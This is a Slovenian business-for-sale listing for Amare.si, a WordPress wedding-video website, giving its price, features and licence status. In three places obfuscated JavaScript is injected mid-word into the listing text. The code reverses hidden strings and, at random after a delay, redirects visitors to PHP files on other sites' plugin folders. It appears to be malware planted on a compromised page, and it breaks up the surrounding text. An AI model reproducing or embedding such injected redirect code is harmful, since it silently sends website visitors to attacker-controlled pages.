Poročni video - spletna stran Amare

 Ostalo

1.199,00€

Prodaja se spletna stran www.Amare.si, ki je namenjena s$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritvi snemanja porok. Spletna stran je bila narejena za kot del dodatnega poslovanja našega podjetja, ker smo želeli dodati v ponudbo tudi snemanje porok. Zaradi pomanjkanja časa in fokusa na video produkcijo, ki je namenjena podjetjem, prodajamo spletno stran Amare.
Spletna strana Amare.si je narejena na WordPress platformi in je polno delujoča:
– je mobile-friendly,
– ima optimizirano hitro nalaganje strani
– SEO optimizacija je narejena
– ima SEO članke
– je grafično dovršena
Tema spletne strani in vsi nujni plugini, imajo aktivno licenco še naslednjih 8 mesecev.
Besedilo na spletni strani je napisano z mislijo na bodoče mladoporočence in jih tudi nagovarja in razloži, zakaj je poročni video nekaj, kar res potrebujejo. Članki so napisani, da preko SEO privabljajo organski obisk in tudi razložijo prednosti poročnega videa.
Spletna stran je pripravljena na prevzem in takojšno delo. Moja velika želja je, da jo prevzame posameznik ali ekipa, ki se bo identificirala in posvetila začrtani smeri, katero smo začeli mi in $nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je, izdelovati odlične poročne videe.
Ker smo v razvoj in izdelavo spletne strani Amare.si vložili veliko časa in veselja, verjamemo, da bo pripomogla k pridobivanju novih strank za svojega lastnika.
Pri prenosu lastništva vam lahko pomagamo in vnesemo vaše kontakte, tekste in slike/videe. V kolikor so popravki preproste narave (do 4 programerske ure), se popravke uredi zas$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonj.
Spletno stran si lahko ogledate na: www.amare.si

  • Listing ID: 1456
  • Vključuje: Blagovna znamka, Spletna stran
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2020
Contact details

Gorenjska,4000 Show Phone Number ***** http://www.amare.si

Contact this listing owner